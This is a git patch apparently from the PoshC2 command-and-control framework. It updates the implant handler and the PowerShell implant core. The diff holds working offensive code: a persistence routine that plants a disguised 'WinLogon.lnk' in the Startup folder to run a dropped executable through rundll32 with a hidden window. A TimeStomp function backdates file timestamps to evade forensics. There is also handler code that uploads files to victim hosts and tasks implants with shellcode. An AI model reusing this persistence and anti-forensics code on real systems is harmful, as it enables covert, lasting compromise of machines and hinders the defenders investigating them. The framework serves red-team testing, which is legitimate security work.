From 4f4b8610a2f1f768ce8c54be2b26666f04e8233b Mon Sep 17 00:00:00 2001 From: benpturner Date: Thu, 9 Aug 2018 10:40:35 +0100 Subject: [PATCH] Updated InstallEXE-Persistence --- ImplantHandler.py | 24 ++++++++++++---------- Modules/Implant-Core.ps1 | 44 +++++++++++++++++++++++++--------------- Tasks.py | 3 ++- 3 files changed, 43 insertions(+), 28 deletions(-) diff --git a/ImplantHandler.py b/ImplantHandler.py index a84fdd2..371027c 100644 --- a/ImplantHandler.py +++ b/ImplantHandler.py @@ -397,7 +397,15 @@ def runcommand(command, randomuri): command = command.replace('sleep ', '') command = command.replace('beacon ', '') update_sleep(command, randomuri) - + + elif "searchhelp" in command.lower(): + searchterm = (command.lower()).replace("searchhelp ","") + import string + helpfull = string.split(posh_help, '\n') + for line in helpfull: + if searchterm in line: + print line + elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "): startup() @@ -674,8 +682,10 @@ def runcommand(command, randomuri): s = source_file.read() source = base64.b64encode(s) if s: - destination = (args.destination).replace("\\","\\\\") - uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (args.destination, source) + destination = args.destination.replace("\\","\\\\") + print "" + print "Uploading %s to %s" % (args.source, destination) + uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, source) new_task(uploadcommand, randomuri) except Exception as e: print "Error with source file: %s" % e @@ -739,14 +749,6 @@ def runcommand(command, randomuri): except Exception as e: print "Error loading file: %s" % e - elif "searchhelp" in command.lower(): - searchterm = (command.lower()).replace("searchhelp ","") - import string - helpfull = string.split(posh_help, '\n') - for line in helpfull: - if searchterm in line: - print line - elif "listmodules" in command.lower(): print os.listdir("%s/Modules/" % POSHDIR) diff --git a/Modules/Implant-Core.ps1 b/Modules/Implant-Core.ps1 index d6773b9..fa0bcaa 100644 --- a/Modules/Implant-Core.ps1 +++ b/Modules/Implant-Core.ps1 @@ -202,28 +202,40 @@ Function Install-Persistence } } Function InstallExe-Persistence() { - $SourceEXE = "rundll32.exe" - $ArgumentsToSourceExe = "shell32.dll,ShellExec_RunDLL %temp%\winlogon.exe" - $DestinationPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WinLogon.lnk" - $WshShell = New-Object -comObject WScript.Shell - $Shortcut = $WshShell.CreateShortcut($DestinationPath) - $Shortcut.TargetPath = $SourceEXE - $Shortcut.Arguments = $ArgumentsToSourceExe - $Shortcut.WindowStyle = 7 - $Shortcut.Save() - TimeStomp $DestinationPath "01/03/2008 12:12 pm" - If ((Test-Path $DestinationPath) -and (Test-Path "$env:Temp\Winlogon.exe")) { - Write-Output "Created StartUp file Exe persistence: $DestinationPath" + if (Test-Path "$env:Temp\Winlogon.exe") { + $SourceEXE = "rundll32.exe" + $ArgumentsToSourceExe = "shell32.dll,ShellExec_RunDLL %temp%\winlogon.exe" + $DestinationPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WinLogon.lnk" + $WshShell = New-Object -comObject WScript.Shell + $Shortcut = $WshShell.CreateShortcut($DestinationPath) + $Shortcut.TargetPath = $SourceEXE + $Shortcut.Arguments = $ArgumentsToSourceExe + $Shortcut.WindowStyle = 7 + $Shortcut.Save() + TimeStomp $DestinationPath "01/03/2008 12:12 pm" + TimeStomp "$env:Temp\Winlogon.exe" "01/03/2008 12:12 pm" + If ((Test-Path $DestinationPath) -and (Test-Path "$env:Temp\Winlogon.exe")) { + Write-Output "Created StartUp file Exe persistence: $DestinationPath" + } else { + Write-Output "Error installing StartUp Exe persistence" + Write-Output "Upload EXE to $env:Temp\Winlogon.exe" + } } else { Write-Output "Error installing StartUp Exe persistence" + Write-Output "Upload EXE to $env:Temp\Winlogon.exe" } } Function RemoveExe-Persistence() { $DestinationPath1 = "$env:Temp\winlogon.exe" - Remove-Item -Force $DestinationPath1 + If (Test-Path $DestinationPath1) { + Remove-Item -Force $DestinationPath1 + } + $DestinationPath2 = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WinLogon.lnk" - Remove-Item -Force $DestinationPath2 - TimeStomp $DestinationPath "01/03/2008 12:12 pm" + If (Test-Path $DestinationPath2) { + Remove-Item -Force $DestinationPath2 + } + If ((Test-Path $DestinationPath1) -or ((Test-Path $DestinationPath2))) { Write-Output "Unable to Remove Persistence" } else { @@ -726,7 +738,7 @@ elseif ([IntPtr]::size -eq 4) { } } Function TimeStomp($File, $Date) { - $file=(gi $file) + $file=(gi $file -force) $file.LastWriteTime=$date; $file.LastAccessTime=$date; $file.CreationTime=$date; diff --git a/Tasks.py b/Tasks.py index c5ddef3..ccba1df 100644 --- a/Tasks.py +++ b/Tasks.py @@ -16,8 +16,9 @@ def newTask(path): for a in tasks: command = a[2] hostinfo = DB.get_hostinfo(RandomURI) + now = datetime.datetime.now() print Colours.YELLOW,"" - print "Command issued against implant %s on host %s %s" % (hostinfo[0],hostinfo[3],hostinfo[11]) + print "Command issued against implant %s on host %s %s (%s)" % (hostinfo[0],hostinfo[3],hostinfo[11],now.strftime("%m/%d/%Y %H:%M:%S")) if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode64")) : print "Loading Shellcode",Colours.END